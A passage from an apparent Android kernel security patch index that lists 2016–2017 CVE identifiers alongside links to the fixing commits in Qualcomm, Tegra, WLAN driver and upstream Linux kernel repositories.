https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=cbc21ceb69cb7bca0643423a7ca982abce3ce50a -CVE-2016-5867 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=8db70aafea51b60dbe9faaba5707be0046758521 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=065360da7147003aed8f59782b7652d565f56be5 - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=5e3dd3f21b44424405a009ba676df52322d9e7cf -CVE-2016-5868 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=dc85dc0b21b1ee3715ee6e80f405d5606ca5e8d2 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=0ada77c044be09db1a35e4718209f41d05d27fe0 - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=fbb765a3f813f5cc85ddab21487fd65f24bf6a8c -CVE-2016-5870 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=71fe5361cbef34e2d606b79e8936a910a3e95566 -CVE-2016-6136 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=43761473c254b45883a64441dd0bc85a42f3645c -CVE-2016-6672 - Link - https://github.com/android/kernel_msm/commit/d8649432b96bd361de20168372c10269e88e1258 -CVE-2016-6675 - Link - prima - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/prima/commit/?id=1353fa0bd0c78427f3ae7d9bde7daeb75bd01d09 -CVE-2016-6676 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=6ba9136879232442a182996427e5c88e5a7512a8 -CVE-2016-6679 - Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=d39345f0abc309959d831d09fcbf1619cc0ae0f5 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=f081695446679aa44baa0d00940ea18455eeb4c5 -CVE-2016-6680 - Link - prima - 
https://www.codeaurora.org/gitweb/quic/la/?p=platform/vendor/qcom-opensource/wlan/prima.git;a=commit;h=08ce2a9e1ccdf6081fc1efb47d2edea4f4ad2ecf - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=2f2fa073b95d4700de88c0f7558b4a18c13ac552 -CVE-2016-6681 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=0950fbd39ff189497f1b6115825c210e3eeaf395 -CVE-2016-6682 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=0950fbd39ff189497f1b6115825c210e3eeaf395 -CVE-2016-6683 - Link - https://android.googlesource.com/kernel/tegra.git/+/android-7.0.0_r0.20 -CVE-2016-6692 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=0f0e7047d39f9fb3a1a7f389918ff79cdb4a50b3 -CVE-2016-6693 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=ac328eb631fa74a63d5d2583e6bfeeb5a7a2df65 -CVE-2016-6694 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=961e38553aae8ba9b1af77c7a49acfbb7b0b6f62 -CVE-2016-6695 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=c319c2b0926d1ea5edb4d0778d88bd3ce37c4b95 -CVE-2016-6696 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=c3c9341bfdf93606983f893a086cb33a487306e5 -CVE-2016-6698 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=de90beb76ad0b80da821c3b857dd30cd36319e61 - Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=3baefa3af45c0ab1ca8391821ea55b9049a3a3da -CVE-2016-6725 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=cc95d644ee8a043f2883d65dda20e16f95041de3 - Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=a8bfc6888280ac70c9c13b1802c1e962522714a4 -CVE-2016-6728 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=37b3cefe6c01bed2e048d7a42b1c4021f4ba279d - Link - 
https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=a3fe90fbd3500e7ecaa32b9da5e582d78cb5cef9 -CVE-2016-6738 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a829c54236b455885c3e9c7c77ac528b62045e79 -CVE-2016-6739 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=ac8242269094729c464ac042a58603e01427e509 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=c4af572a7ad59c0f07fd316a08055bc86dfb5f0d -CVE-2016-6740 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=ef78bd62f0c064ae4c827e158d828b2c110ebcdc - Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=a939a87f0adf91feceb329a5c080b86e1ee333c7 -CVE-2016-6741 - Link - 3.10 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.10.git;a=commit;h=80a1d9978c11f76bbe6d2e622bf2ded18f27e34f - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=d291eebd8e43bba3229ae7ef9146a132894dc293 -CVE-2016-6742 - Link - https://github.com/android/kernel_msm/commit/94f4b81da69ec72486476adb59d7c818bd4ffbd0 -CVE-2016-6745 - Depends - Link - https://github.com/android/kernel_msm/commit/80dd4267f644c7ba9657df52f6bce42f0bef1b4e - Link - https://github.com/android/kernel_msm/commit/9397e20764da2fdffdfe20e35cb78211753b83cc - Link - https://github.com/android/kernel_msm/commit/8667cc5ed59b7a4b64d82d8014bead09bddb1f76 - Link - https://github.com/android/kernel_msm/commit/19055017169363f176693c3e41ebdfc3c8e11ef4 - Link - https://github.com/android/kernel_msm/commit/f5c96a8c96615490b72357b1c0940196f7dde474 -CVE-2016-6748 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=be651d020b122a1ba9410d23ca4ebbe9f5598df6 - Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=313d9f89e76ada8d900c9a578cd5cb77d5813625 -CVE-2016-6749 - Link - 
https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=f9185dc83b92e7d1ee341e32e8cf5ed00a7253a7 -CVE-2016-6750 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=34bda711a1c7bc7f9fd7bea3a5be439ed00577e5 -CVE-2016-6751 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=4907b74ecd5ef8c6d85f1b430f386e381d5b8229 -CVE-2016-6752 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?h=0de2c7600c8f1f0152a2f421c6593f931186400a -CVE-2016-6753 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=5ee75a32931dc70a7af2be42650ac5f14db99674 -CVE-2016-6755 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=b5df02edbcdf53dbbab77903d28162772edcf6e0 - Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=652c8005752b28c22107e928c28aabce1dfdde84 -CVE-2016-6756 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=f91d28dcba304c9f3af35b5bebaa26233c8c13a5 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=3a214ef870dc97437c7de79a1507dfe5079dce88 -CVE-2016-6757 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=cd99d3bbdb16899a425716e672485e0cdc283245 - Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=f2ba68242d79016cc07b59aa41a67b7a1d36bf9b -CVE-2016-6786 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f63a8daa5812afef4f06c962351687e1ff9ccb2b -CVE-2016-6787 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f63a8daa5812afef4f06c962351687e1ff9ccb2b -CVE-2016-6791 - Link - https://source.codeaurora.org/quic/la//kernel/msm/commit/?id=30a4f0783d2978e27a8b8856d8e358ccaf5ddab4 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=62580295210b6c0bd809cde7088b45ebb65ace79 -CVE-2016-6828 - Link - 
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/include/net/tcp.h?id=bb1fceca22492109be12640d49f5ea5a544c6bb4 -CVE-2016-7042 - Link - http://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=03dab869b7b239c4e013ec82aea22e181e441cfc -CVE-2016-7097 - Depends - Link - ^4.8 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=073931017b49d9458aa351605b43a7e34598caef - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/6b0c893dc08060d6999b07136391d8a298678dae - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/aedf77d56472d1fddf050c61c1017d4f51149fb1 -CVE-2016-7117 - Link - ^4.5 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=34b88a68f26a75e4fded796f1a49c40f82234b7d - Link - ^4.5 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=0b5240c45e2029986526b1405ab24906c708f770 -CVE-2016-7910 - Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=77da160530dd1dc94f6ae15a981f24e5f0021e84 -CVE-2016-7911 - Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=8ba8682107ee2ca3347354e018865d8e1967c5f4 -CVE-2016-7912 - Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=38740a5b87d53ceb89eb2c970150f6e94e00373a -CVE-2016-7913 - Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=8dfbcc4351a0b6d2f2d77f367552f48ffefafe18 -CVE-2016-7914 - Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=8d4a2ec1e0b41b0cf9a0c5cd4511da7f8e4f3de2 -CVE-2016-7915 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=50220dead1650609206efe91f0cc116132d59b3f -CVE-2016-7916 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8148a73c9901a8794a50f950083c00ccf97d43b3 -CVE-2016-7917 - Link - 
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c58d6c93680f28ac58984af61d0a7ebf4319c241 -CVE-2016-8391 - Link - https://source.codeaurora.org/quic/la//kernel/msm/commit/?id=30a4f0783d2978e27a8b8856d8e358ccaf5ddab4 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=62580295210b6c0bd809cde7088b45ebb65ace79 -CVE-2016-8392 - Link - https://source.codeaurora.org/quic/la//kernel/msm/commit/?id=30a4f0783d2978e27a8b8856d8e358ccaf5ddab4 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=62580295210b6c0bd809cde7088b45ebb65ace79 -CVE-2016-8393 - Link - https://github.com/android/kernel_msm/commit/9397e20764da2fdffdfe20e35cb78211753b83cc - Link - https://github.com/android/kernel_msm/commit/fd11eb5c433743c87bebe699604adfd7e7e805cf - Link - https://github.com/android/kernel_msm/commit/8a950b2d64cec7b8022b7572c2d3d9221b2dbab2 -CVE-2016-8394 - Link - https://github.com/aosp-mirror/kernel_msm/commit/4b9ae9048d63ef9fe9f8cc9d0e33cc38148b268d -CVE-2016-8399 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0eab121ef8750a5c8637d51534d5e9143fb0633f -CVE-2016-8401 - Link - https://github.com/aosp-mirror/kernel_msm/commit/44a8e527e156245eff04ff36f426cb1ba8d23e34 -CVE-2016-8402 - Link - 3.4 - https://source.codeaurora.org/quic/la/kernel/msm/commit/drivers?id=8e145d45fdff30cb6471b7cc9717c30b21a0ec6b - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/de51c6f363b8ba7c513e8a5bbae3459571966bfd -CVE-2016-8403 - Link - https://android.googlesource.com/kernel/tegra/+/de55d30d3ed76ab8b5c61f2ccf730ce86fd59592 -CVE-2016-8404 - Link - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=232ec805c7cc4150f05aa06a98335378ab272ec7 -CVE-2016-8405 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=2dc705a9930b4806250fbf5a76e55266e59389f2 -CVE-2016-8406 - Link - 
https://github.com/android/kernel_msm/commit/d7a15270ad80aff21d09aaea9c0e98e03e541b50 -CVE-2016-8407 - Link - https://github.com/android/kernel_msm/commit/c01b4ad61a7e4291ea3db18baaf6c3532eff7e38 -CVE-2016-8410 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?h=e2bbf665187a1f0a1248e4a088823cb182153ba9 -CVE-2016-8412 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=42a98c44669d92dafcf4d6336bdccaeb2db12786 -CVE-2016-8413 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=bc77232707df371ff6bab9350ae39676535c0e9d -CVE-2016-8414 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=320970d3da9b091e96746424c44649a91852a846 -CVE-2016-8415 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=188e12a816508b11771f362c852782ec9a6f9394 -CVE-2016-8416 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=e3af5e89426f1c8d4e703d415eff5435b925649f -CVE-2016-8417 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=01dcc0a7cc23f23a89adf72393d5a27c6d576cd0 -CVE-2016-8418 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=8f8066581a8e575a7d57d27f36c4db63f91ca48f -CVE-2016-8419 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=9ba50d536227666a5b6abd51f2b122675d950488 -CVE-2016-8420 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=c6597e015a7ce5ee71d3725fc55e64fc50923f4e -CVE-2016-8421 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=61a5cdb9adc96645583f528ac923e6e59f3abbcb -CVE-2016-8434 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.14/commit/?id=3e3866a5fced40ccf9ca442675cf915961efe4d9 -CVE-2016-8436 - Link - 
https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=228e8d17b9f5d22cf9896ab8eff88dc6737c2ced -CVE-2016-8444 - Link - https://github.com/aosp-mirror/kernel_msm/commit/78506ab75e0cbbfbf372867cc24282d7e739f4d6 -CVE-2016-8450 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=e909d159ad1998ada853ed35be27c7b6ba241bdb -CVE-2016-8452 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=39fa8e972fa1b10dc68a066f4f9432753d8a2526 -CVE-2016-8453 - Link - https://github.com/android/kernel_msm/commit/f10f4e420dddc35dfef53965c55ffd5bdec41a45 -CVE-2016-8454 - Link - https://github.com/android/kernel_msm/commit/39bd1fc23040a441628884588b19bc4d199b59c2 -CVE-2016-8455 - Link - https://github.com/android/kernel_msm/commit/068427b76963929b220a4be40cdf77856374df55 -CVE-2016-8456 - Link - https://github.com/android/kernel_msm/commit/e5c1b001a822e8b38680655c400e7b3f67cc3323 -CVE-2016-8457 - Link - https://github.com/android/kernel_msm/commit/e5c1b001a822e8b38680655c400e7b3f67cc3323 -CVE-2016-8458 - Link - 3.10 - https://github.com/android/kernel_msm/commit/d567c744898f67e1c54db5339f41815d02f3d59e - Link - 3.18 - https://github.com/android/kernel_msm/commit/11ab3add6cfb1ef752ac38adf1b4bf15617772e9 -CVE-2016-8463 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=cd0fa86de6ca1d40c0a93d86d1c0f7846e8a9a10 -CVE-2016-8464 - Link - 3.10 - https://github.com/android/kernel_msm/commit/cbf66a616bb08cc6c932e4122f3271df83e253bb - Link - 3.18 - https://android.googlesource.com/kernel/tegra/+/ffbad101e158cea6b93965302b2a3c3f8ef11bf8 -CVE-2016-8465 - Depends - Link - 3.10 - https://github.com/android/kernel_msm/commit/8f1621cd0d0ca0bc494a926a1331f582b27b913e - Link - 3.10 - https://github.com/android/kernel_msm/commit/50ba575e9cd28ab9537f0961bbc051a6a727da74 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=4add5112babf94dbc0f86e93395b6622d5080d16 - 
Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=3619fd91b831f184d2e544e23cb54d20eed2531e -CVE-2016-8465 - Depends - Link - 3.10 - https://github.com/android/kernel_msm/commit/8f1621cd0d0ca0bc494a926a1331f582b27b913e - Link - 3.10 - https://github.com/android/kernel_msm/commit/8f1621cd0d0ca0bc494a926a1331f582b27b913e - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=4add5112babf94dbc0f86e93395b6622d5080d16 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=3619fd91b831f184d2e544e23cb54d20eed2531e -CVE-2016-8466 - Link - 3.10 - https://github.com/android/kernel_msm/commit/67d429b1cb87879c33df58febc0b7bf6712bc7c0 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=4af032a458109027c88c478c800aac97a7105250 -CVE-2016-8468 - Link - 3.18 - https://github.com/android/kernel_msm/commit/0d37d64f02e18a301867ae7684c3801bd99c5df2 -CVE-2016-8473 - Link - https://github.com/android/kernel_msm/commit/900b8b72c57cefebb39c150dfddfdd493a1cea79 -CVE-2016-8474 - Link - https://github.com/android/kernel_msm/commit/900b8b72c57cefebb39c150dfddfdd493a1cea79 -CVE-2016-8475 - Link - https://github.com/android/kernel_msm/commit/d906945fc287f9df48b99349fea962b921d4d39e -CVE-2016-8476 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=bfe8035bce6fec72ed1d064b94529fce8fb09799 -CVE-2016-8477 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=33c9042e38506b04461fa99e304482bc20923508 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=96145eb5f0631f0e105d47abebc8f940f7621eeb -CVE-2016-8478 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=e3af5e89426f1c8d4e703d415eff5435b925649f -CVE-2016-8479 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=1a9d60a353d6c8191cfec089f8cb502626bb0b0e - Link - 4.4 - 
https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=eed663a48bec729bb66aaad18ab3fac3b7269581 -CVE-2016-8480 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=0ed0f061bcd71940ed65de2ba46e37e709e31471 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=cd70f6025a7bbce89af7a7abf4c40a219fdea406 - Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=420d51e0733e72830fa591f1e67f5a40ce11dc51 -CVE-2016-8481 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=ce9db0874906f6aedd80bb28d457eadfe38bdd02 - Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=c8c16b7406c68a5a9f35c5afbfcafd893e197425 - Link - https://github.com/android/kernel_msm/commit/831da5d113d214db6894e9fd0ce98762ee8a544a -CVE-2016-8483 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=6997dcb7ade1315474855821e64782205cb0b53a -CVE-2016-8650 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=f5527fffff3f002b0a6b376163613b82f69de073 -CVE-2016-8655 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c -CVE-2016-9120 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9590232bb4f4cc824f3425a6e1349afbe6d6d2b7 -CVE-2016-9191 - Link - 3.11-^4.8 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=93362fa47fe98b62e4a34ab408c4a418432e7939 -CVE-2016-9555 - Link - https://github.com/torvalds/linux/commit/bf911e985d6bbaa328c20c3e05f4eb03de11fdd6 -CVE-2016-9576 - Link - 3.4 - https://review.lineageos.org/#/c/176402/ - Link - 3.10 - https://review.lineageos.org/#/c/175603/ - Link - https://github.com/torvalds/linux/commit/a0ac402cfcdc904f9772e1762b3fda112dcc56a0 -CVE-2016-9604 - Link - 
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=44c037827f0aeddbbbb323930fa3d09a7b4fffca -CVE-2016-9754 - Link - http://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=59643d1535eb220668692a5359de22545af579f6 -CVE-2016-9793 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b98b0bc8c431e3ceb4b26b0dfc8db509518fb290 -CVE-2016-9794 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=a27178e05b7c332522df40904f27674e36ee3757 -CVE-2016-9806 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=92964c79b357efd980812c4de5c1fd2ec8bb5520 -CVE-2017-0403 - Link - 3.0-^3.18 - https://github.com/android/kernel_msm/commit/2c5c1fd0d2a2a96fab750fa332cb703022c16c04 -CVE-2017-0404 - Link - ^3.18 - https://github.com/android/kernel_msm/commit/4faa6d2e9b53546823882d8889820ff9ce3c372f -CVE-2017-0427 - Link - 3.10 - https://github.com/android/kernel_msm/commit/5db4167c9924c68ab9554bba3a98ecfd14b91a8e - Link - 3.18 - https://github.com/android/kernel_msm/commit/1d6d364ee174676a225a77dc7ca8dac887199718 -CVE-2017-0430 - Link - https://github.com/android/kernel_msm/commit/709105c301aa53fb86c46b36f882998558b19652 -CVE-2017-0433 - Link - https://github.com/android/kernel_msm/commit/fe160e51f02ee5db529c2e84ac8364c89cce005e - Link - https://github.com/android/kernel_msm/commit/2615c5f302441568e6dd20007bc5246d72837e80 -CVE-2017-0434 - Link - 3.18 - https://github.com/android/kernel_msm/commit/d740e7228bd1578ed01762998b2a86e7df56e608 -CVE-2017-0435 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=ce9db0874906f6aedd80bb28d457eadfe38bdd02 - Link - https://github.com/android/kernel_msm/commit/831da5d113d214db6894e9fd0ce98762ee8a544a -CVE-2017-0436 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=ce9db0874906f6aedd80bb28d457eadfe38bdd02 -CVE-2017-0437 - Link - qcacld-2.0 - 
https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=1f0b036dc74ccb6e9f0a03a540efdb0876f5ca77 -CVE-2017-0438 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=1f0b036dc74ccb6e9f0a03a540efdb0876f5ca77 -CVE-2017-0439 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=81b6b5538d3227ed4b925fcceedb109abb2a4c61 - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=ff866a1e9a0f653252b5d5b7eb087374c5bad65d -CVE-2017-0440 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=10f0051f7b3b9a7635b0762a8cf102f595f7a268 -CVE-2017-0441 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=da87131740351b833f17f05dfa859977bc1e7684 - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=e578706506f98a4962220066d92d81e853ac7212 -CVE-2017-0442 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=1f0b036dc74ccb6e9f0a03a540efdb0876f5ca77 -CVE-2017-0443 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=f1081e78eff75ca665c662493736b17cb792b46d - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=a4c5eefd5dd761445784963f3b6605d24d2bc3af -CVE-2017-0444 - Link - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=230f280dd4046a227665ff07c9afaa7b9aa1e061 -CVE-2017-0445 - Link - https://github.com/android/kernel_msm/commit/773179468893965c2b81aa7ffe3722b6868ef749 - Link - 
https://github.com/android/kernel_msm/commit/367e64520dba1652d8f6d0ac1ebda3cab0f9e374 - Link - https://github.com/android/kernel_msm/commit/2615c5f302441568e6dd20007bc5246d72837e80 - Link - https://github.com/android/kernel_msm/commit/fe160e51f02ee5db529c2e84ac8364c89cce005e -CVE-2017-0446 - Link - https://github.com/android/kernel_msm/commit/773179468893965c2b81aa7ffe3722b6868ef749 -CVE-2017-0447 - Link - https://github.com/android/kernel_msm/commit/773179468893965c2b81aa7ffe3722b6868ef749 -CVE-2017-0449 - Link - https://github.com/android/kernel_msm/commit/323a28bf14c622bdd1b9ecf09a339b00af98c965 -CVE-2017-0451 - Depends - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=59f55cd40b5f44941afc78b78e5bf81ad3dd723e - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=35346beb2d8882115f698ab22a96803552b5c57e -CVE-2017-0452 - Link - https://github.com/android/kernel_msm/commit/4fa7499742c56c7f7064c9dc14c3a34f4be38851 -CVE-2017-0453 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=29c4ddb447b2d49409a9d0b93631f84a9d2e922e - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=a2959858f428acfca3ca4c61d3c10b446bfe9b60 - Link - prima - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/prima/commit/?id=ddf864f37134df0960d337ff16e6f2435b4fe90c -CVE-2017-0454 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=01f3ad23574c85a060e6add7a20173621b5b2c77 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=484349ebc927b7be6cc9187c6bd71ffb3f4112d1 - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=263bb8242e005803529cb7cd785354de817db88a -CVE-2017-0455 - Link - https://source.codeaurora.org/quic/la/kernel/lk/commit/?id=2c00928b4884fdb0b1661bcc530d7e68c9561a2f -CVE-2017-0456 - Link - 
